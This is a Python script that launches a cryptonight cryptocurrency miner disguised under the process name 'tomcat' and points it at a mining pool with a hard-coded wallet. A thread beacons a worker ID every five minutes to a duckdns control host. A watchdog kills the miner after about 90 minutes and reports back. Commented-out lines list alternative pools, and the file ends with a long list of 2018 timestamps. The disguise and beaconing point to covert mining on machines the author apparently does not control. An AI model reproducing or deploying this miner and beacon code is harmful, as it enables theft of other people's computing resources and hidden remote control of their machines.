import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:33:07.342584
#2018-02-17 16:18:05.849560
#2018-02-17 18:05:09.159501
#2018-02-17 19:54:06.513977
#2018-02-17 21:42:04.096035
#2018-02-17 23:26:01.903645
#2018-02-18 01:16:06.434533
#2018-02-18 03:03:04.112581
#2018-02-18 04:52:04.779743
#2018-02-18 06:44:05.305925
#2018-02-18 08:33:07.370400
#2018-02-18 10:20:07.079752
#2018-02-18 12:06:05.785908
#2018-02-18 13:51:04.278795
#2018-02-18 15:43:07.574001
#2018-02-18 17:33:06.688462
#2018-02-18 19:19:07.487305
#2018-02-18 21:05:03.874524
#2018-02-18 22:52:01.951768
#2018-02-19 00:40:01.454522
#2018-02-19 02:26:02.136526
#2018-02-19 04:13:01.290605
#2018-02-19 05:57:04.195899
#2018-02-19 07:46:07.469995
#2018-02-19 09:37:06.480258
#2018-02-19 11:27:09.055765
#2018-02-19 13:14:05.284259
#2018-02-19 15:02:08.727397
#2018-02-19 16:51:07.335769
#2018-02-19 18:38:05.752089
#2018-02-19 20:23:06.425147
#2018-02-19 22:11:04.922360
#2018-02-19 23:58:07.496179
#2018-02-20 01:45:08.331883
#2018-02-20 03:31:05.144502
#2018-02-20 05:18:06.122008
#2018-02-20 07:02:04.381045
#2018-02-20 08:48:01.375554
#2018-02-20 10:32:07.881546
#2018-02-20 12:17:07.206572
#2018-02-20 14:06:04.512644
#2018-02-20 15:49:01.968466
#2018-02-20 17:36:08.604338
#2018-02-20 19:24:08.702367
#2018-02-20 21:14:04.067694
#2018-02-20 22:58:05.191907
#2018-02-21 00:43:05.203978
#2018-02-21 02:29:07.985253
#2018-02-21 04:17:04.519049
#2018-02-21 06:03:08.152612
#2018-02-21 07:49:10.876180
#2018-02-21 09:35:05.417594
#2018-02-21 11:23:05.298693
#2018-02-21 13:12:01.554198
#2018-02-21 14:59:09.091224
#2018-02-21 16:48:12.537942
#2018-02-21 18:33:07.681404
#2018-02-21 20:18:07.488815
#2018-02-21 22:06:08.316330
#2018-02-21 23:53:03.780900
#2018-02-22 01:42:06.287415
#2018-02-22 03:30:05.436480
#2018-02-22 05:16:05.559269
#2018-02-22 07:02:08.006236
#2018-02-22 08:50:08.220483
#2018-02-22 10:38:06.363252
#2018-02-22 12:26:01.891779
#2018-02-22 14:12:05.552354
#2018-02-22 16:02:05.833060
#2018-02-22 17:48:01.689506
#2018-02-22 19:36:06.977037
#2018-02-22 21:27:07.016421
#2018-02-22 23:15:09.284521
#2018-02-23 01:03:01.828582
#2018-02-23 02:51:06.361254
#2018-02-23 04:39:01.688224
#2018-02-23 06:25:08.589287
#2018-02-23 08:12:07.097408
#2018-02-23 10:26:04.147231
#2018-02-23 12:19:05.755090
#2018-02-23 14:08:05.635706
#2018-02-23 15:58:04.591955
#2018-02-23 17:43:09.887909
#2018-02-23 19:29:01.430235
#2018-02-23 21:12:01.876674
#2018-02-23 23:01:02.286360
#2018-02-24 00:47:07.006484
#2018-02-24 02:37:07.700192
#2018-02-24 04:33:05.502401
#2018-02-24 06:18:03.198257
#2018-02-24 08:06:01.585041
#2018-02-24 09:52:06.367294
#2018-02-24 11:47:01.644008
#2018-02-24 13:38:04.762192
#2018-02-24 15:25:05.520510
#2018-02-24 17:14:07.273881
#2018-02-24 19:06:06.471621
#2018-02-24 20:54:06.493435
#2018-02-24 23:19:04.533595
#2018-02-25 03:23:02.107854
#2018-02-25 06:53:06.132468